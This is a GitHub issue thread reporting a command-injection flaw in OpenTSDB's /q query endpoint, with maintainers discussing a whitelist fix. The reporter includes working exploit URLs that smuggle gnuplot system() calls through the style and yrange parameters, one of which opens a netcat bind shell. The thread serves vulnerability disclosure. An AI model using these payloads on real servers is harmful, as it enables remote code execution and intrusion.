Open gsocgsoc opened 7 years ago
manolama
commented
7 years ago Arg why is security hard! Heh, no thank you for looking. I would prefer the whitelist, just didn't have time to dig through the possible options. I'll leave this open to get to it.
gsocgsoc
commented
6 years ago Just tried on the latest opentsdb-2.4.0RC2, still vulnerable.
Don't leave any of your boxes open on the internet.
johann8384
commented
6 years ago Don't leave your boxes open on the internet either way! :) Thanks for checking, I will look into it more.
On Mon, Jan 29, 2018 at 9:48 AM, gsoc notifications@github.com wrote:
Just tried on the latest opentsdb-2.4.0RC2, still vulnerable.
http://xxx.com:4242/q?start=2018/01/29-15:51:00&end=2018/ 01/29-16:01:07&m=sum:jmxdata.heap{host=}&o=&yrange=[0:]& wxh=1900x771&style=linespoint%0Asystem%20%22id%20%3E/tmp/jalla.txt%22&json <http://xxx.com:4242/q?start=2018/01/29-15:51:00&end=2018/01/29-16:01:07&m=sum:jmxdata.heap%7Bhost=%7D&o=&yrange=%5B0:%5D&wxh=1900x771&style=linespoint%0Asystem%20%22id%20%3E/tmp/jalla.txt%22&json>
Don't leave any of your boxes open on the internet.
— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/OpenTSDB/opentsdb/issues/996#issuecomment-361287753, or mute the thread https://github.com/notifications/unsubscribe-auth/AAJcMfi-W9j9Uvb5PrGR_SLcxXoR1YjBks5tPegygaJpZM4N2ztq .
Hi,
Sorry for being a pain in the ass, but can't we just whitelist the desired input instead of blacklisting? there will always be ways around the blacklist
Here's an example from a quick test only: xxx.com:4242/q?start=2017/06/12-09:44:00&end=2017/06/12-09:54:51&m=sum:jmxdata.cpu&o=&yrange=[0:]%0Asystem(sprintf("nc -lvp 1234 -e /bin/sh"))&wxh=1900x772&style=linespoint&json
The output of that is written to the /tmp/opentsdb/xxxxxx.out but you can create a bind shell easily as seen above.
There are most likely atleast a couple of more ways of doing it.
Related issues: #953 #781